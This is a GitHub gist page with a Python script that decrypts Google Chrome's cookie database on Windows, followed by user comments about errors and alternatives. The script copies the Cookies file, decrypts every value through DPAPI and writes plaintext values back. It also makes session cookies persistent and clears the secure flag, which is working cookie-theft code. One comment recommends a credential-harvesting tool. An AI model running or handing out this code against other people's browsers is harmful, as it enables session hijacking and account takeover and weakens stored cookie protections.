Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Decrypt Chrome Cookies File (Python 3) - Windows
#Based off https://gist.github.com/DakuTree/98c8362fb424351b803e & pieces of https://gist.github.com/jordan-wright/5770442
from os import getenv
from shutil import copyfile
import sqlite3
import win32crypt #https://sourceforge.net/projects/pywin32/
# Copy Cookies to current folder
copyfile(getenv("APPDATA") + "/../Local/Google/Chrome/User Data/Default/Cookies", './Cookies')
# Connect to the Database
conn = sqlite3.connect('./Cookies')
cursor = conn.cursor()
# Get the results
cursor.execute('SELECT host_key, name, value, encrypted_value FROM cookies')
for host_key, name, value, encrypted_value in cursor.fetchall():
# Decrypt the encrypted_value
decrypted_value = win32crypt.CryptUnprotectData(encrypted_value, None, None, None, 0)[1].decode('utf-8') or value or 0
# Update the cookies with the decrypted value
# This also makes all session cookies persistent
cursor.execute('\
UPDATE cookies SET value = ?, has_expires = 1, expires_utc = 99999999999999999, is_persistent = 1, secure = 0\
WHERE host_key = ?\
AND name = ?',
(decrypted_value, host_key, name));
conn.commit()
conn.close()
@christian-ehrisman

This comment has been minimized.

Copy link

christian-ehrisman commented Jun 23, 2018

Thanks, it worked for me with one change: in my chrome cookie db 'secure' is 'is_secure'

@igorabrandao

This comment has been minimized.

Copy link

igorabrandao commented Apr 9, 2019

There is a version for Mac OS and/or Linux?

@Stefan2142

This comment has been minimized.

Copy link

Stefan2142 commented Apr 18, 2019

This is the error Im getting

C:\Users\stefa\Downloads>%python3% cookie_decrypt.py
Traceback (most recent call last):
  File "cookie_decrypt.py", line 18, in <module>
    decrypted_value = win32crypt.CryptUnprotectData(encrypted_value, None, None, None, 0)[1].decode('utf-8') or value or 0
pywintypes.error: (-2146893813, 'CryptProtectData', 'Key not valid for use in specified state.')

What can I don? Im running it on windows 10. From what I could debug - it stopped at first row.

@mrAsh4r

This comment has been minimized.

Copy link

mrAsh4r commented Aug 16, 2019

Why are you using
getenv("APPDATA") + "/../Local/Google/Chrome/User Data/Default/Cookies"
instead
getenv("LOCALAPPDATA") + "/Google/Chrome/User Data/Default/Cookies" ?

@tanwar1998

This comment has been minimized.

Copy link

tanwar1998 commented Dec 12, 2019

It is just copying the cookie file from '/../Local/Google/Chrome/User Data/Default/Cookies' to current folder and not doing any actual decryption

@yugo-harago

This comment has been minimized.

Copy link

yugo-harago commented Dec 12, 2019

How can I use it?

@GSapiah

This comment has been minimized.

Copy link

GSapiah commented Jul 7, 2020

I'm getting an error when calling the CryptUnprotectData method.

error: (13, 'CryptProtectData', 'The data is invalid.')

I can see that the encrypted values are printing out fine but the process fails at the decryption step.

# Decrypt the encrypted_value
	decrypted_value = win32crypt.CryptUnprotectData(encrypted_value, None, None, None, 0)[1].decode('utf-8') or value or 0

Any pointers?

@mrAsh4r

This comment has been minimized.

Copy link

mrAsh4r commented Jul 7, 2020

I'm getting an error when calling the CryptUnprotectData method.

error: (13, 'CryptProtectData', 'The data is invalid.')

I can see that the encrypted values are printing out fine but the process fails at the decryption step.

# Decrypt the encrypted_value
	decrypted_value = win32crypt.CryptUnprotectData(encrypted_value, None, None, None, 0)[1].decode('utf-8') or value or 0

Any pointers?

It`s because the password encryption system in Chromium has changed

@GSapiah

This comment has been minimized.

Copy link

GSapiah commented Jul 7, 2020

Thanks @mrAsh4r: Is there any alternative library?

@mrAsh4r

This comment has been minimized.

Copy link

mrAsh4r commented Jul 7, 2020

@GSapiah, yep. You can check LaZagne (https://github.com/AlessandroZ/LaZagne)

@nootkroot

This comment has been minimized.

Copy link

nootkroot commented Jul 20, 2020

@GSapiah, yep. You can check LaZagne (https://github.com/AlessandroZ/LaZagne)

Isn't that just for passwords or does it work also for cookies? If so, how?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.